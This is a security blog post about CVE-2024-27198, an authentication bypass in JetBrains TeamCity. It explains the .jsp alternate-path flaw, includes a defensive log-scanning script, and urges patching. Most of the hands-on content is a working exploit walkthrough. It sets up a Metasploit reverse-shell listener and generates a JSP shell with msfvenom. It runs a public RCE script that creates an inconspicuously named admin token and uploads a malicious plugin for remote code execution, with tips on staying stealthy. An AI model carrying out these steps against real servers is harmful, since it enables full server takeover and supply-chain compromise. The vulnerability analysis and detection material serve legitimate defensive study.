TeamCity Authentication Bypass Vulnerability - CVE-2024-27198

Author: Chad Wilson (@NetPenguins)
Understanding CVE-2024-27198: A Critical Authentication Bypass Vulnerability
Introduction
CVE-2024-27198 is a severe security flaw with a CVSSv3 score of 9.8, indicating its critical nature. This vulnerability is present in the web component of JetBrains TeamCity and is caused by an alternate path issue, which can be exploited to bypass authentication mechanisms.
Important Note ⚠️
If you are affected by this vulnerability, do not delay: patch your instances now. More information about patching can be found on the JetBrains Blog.
Detailed Exploit Analysis
The vulnerability stems from a weakness in the BaseController class within the web-openapi.jar library of TeamCity. When an API endpoint receives a request appended with .jsp, the BaseController class erroneously allows the request to bypass the standard authentication process. This flaw can be exploited by an attacker to gain unauthorized administrative access to the TeamCity server. [Source]
The Alternate Path Issue
An alternate path issue occurs when software provides an unintended route to a goal that should be protected by authentication. In the case of CVE-2024-27198, the alternate path allows attackers to manipulate the URL to access authenticated endpoints directly, bypassing the login mechanism and gaining full control over the server.
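The one observable the description above gives a defender is a request to an API endpoint whose path carries a .jsp suffix, something a legitimate REST client never sends. The following is an added example, not code from the original post or from the author's repository: it scans constructed web-server access-log lines (combined log format, documentation-range IPs) for that pattern. It generalizes slightly from "appended with .jsp" to any .jsp occurrence in a path under /app/rest/, and records whether the server actually served the request (2xx) or rejected it.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access-log lines (combined log format); not real TeamCity logs.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /app/rest/users.jsp HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /app/rest/server.jsp?fields=version HTTP/1.1" 200 210 "-" "python-requests/2.31.0"
198.51.100.4 - - [10/Mar/2024:12:00:05 +0000] "GET /app/rest/users HTTP/1.1" 401 0 "-" "curl/8.4.0"
198.51.100.4 - - [10/Mar/2024:12:00:07 +0000] "GET /overview.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:12:00:09 +0000] "POST /app/rest/users.jsp HTTP/1.1" 404 0 "-" "curl/8.4.0"
"""

# ip, ident, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_bypass_attempt(target: str) -> bool:
    """A REST API path should never contain '.jsp'; its presence under /app/rest/
    matches the CVE-2024-27198 alternate-path pattern. Only the path part is
    inspected, so query strings do not affect the decision."""
    path = urlsplit(target).path.lower()
    return path.startswith("/app/rest/") and ".jsp" in path


def scan_log(text: str) -> list[dict]:
    """Return one record per matching request. 'served' is True when the server
    answered 2xx, i.e. the unauthenticated request was actually processed;
    any other status means the attempt was rejected (e.g. on a patched server)."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None or not is_bypass_attempt(m["target"]):
            continue
        status = int(m["status"])
        hits.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                     "target": m["target"], "status": status,
                     "served": 200 <= status < 300})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        flag = "SERVED" if h["served"] else "rejected"
        print(f'{h["time"]} {h["ip"]} {h["method"]} {h["target"]} -> {h["status"]} ({flag})')
```

Point the scanner at the reverse-proxy or TeamCity access log in front of the server; a served hit from before the patch date is the trigger for the token and plugin review described later in this post.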
The Impact on TeamCity
Exploiting CVE-2024-27198 grants attackers complete control over all TeamCity projects, builds, agents, and artifacts. This level of access not only compromises the integrity of the server but also opens the door to more extensive supply chain attacks, where the attacker could insert malicious code into software builds.
Setting Up and Executing the Exploit on Kali Linux
To demonstrate the exploit, one can set up a vulnerable TeamCity environment using Docker on Kali Linux:
# Pull a vulnerable TeamCity Server docker image (version: 2023.11.3)
docker pull jetbrains/teamcity-server:2023.11.3
# Run the docker container
docker run -it -d --name teamcity -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3
Navigate to http://localhost:8111 and complete the setup wizard to finish the server installation.
Prepare the listener
In a separate terminal window open a listener:
# Open a listener in metasploit
msfconsole -q -x "use multi/handler; set payload java/jsp_shell_reverse_tcp; set lhost eth0; set lport 8088; exploit"
Execute! Execute! Execute! 💥
After the server and listener are running, the exploit can be executed using the provided Python script.
Let's think about this realistically for a moment. The vulnerability allows us to bypass authentication and execute functionality via the available JSPs. With that in mind, let's approach this from a stealth engagement perspective. We should first list the users on the server, obtain the user ID we are interested in (preferably an admin), and then create a token for that admin with a realistic name (such as cicdconnector).
It would be a safe assumption that an admin user exists at userid=1, but it is good practice to check.
So let's do that now! In a terminal run the following:
# Clone the exploit repository
git clone https://github.com/NetPenguins/CVE-2024-27198-RCE
cd CVE-2024-27198-RCE
# Create a JSP shell; I like to use https://www.revshells.com for basic, quick jobs like this.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=eth0 LPORT=8088 -f raw -o shell.jsp
# Execute the exploit script gathering all users
python CVE-2024-27198-RCE.py -t http://localhost:8111 -g
# Use the user ID you found to complete the exploit and obtain RCE
python CVE-2024-27198-RCE.py -t http://localhost:8111 -i 1 -f shell.jsp -e -n cicdconnection
This script will create a new access token named cicdconnection using the user ID we pass in.
Then it will create a plugin .zip containing the shell.jsp we generated previously, and upload and activate the plugin.
Lastly, it will launch the malicious JSP using the user's token, opening a connection to the established listener.
In this way, we are able to leverage a user that already exists and generate an access token that looks like a plausible token this user might have generated.
The only thing that stands out at this point (excluding the noise we are likely making on the network) is the addition of an external plugin inside the TeamCity server.
Conclusion
CVE-2024-27198 is a critical vulnerability that requires immediate attention from administrators of TeamCity On-Premises installations. The alternate path issue at the heart of this vulnerability highlights the importance of thorough security practices in software development and the necessity of regular updates and patches. If you are affected by this vulnerability, do not delay: patch your instances NOW. Patching guidance is on the JetBrains Blog.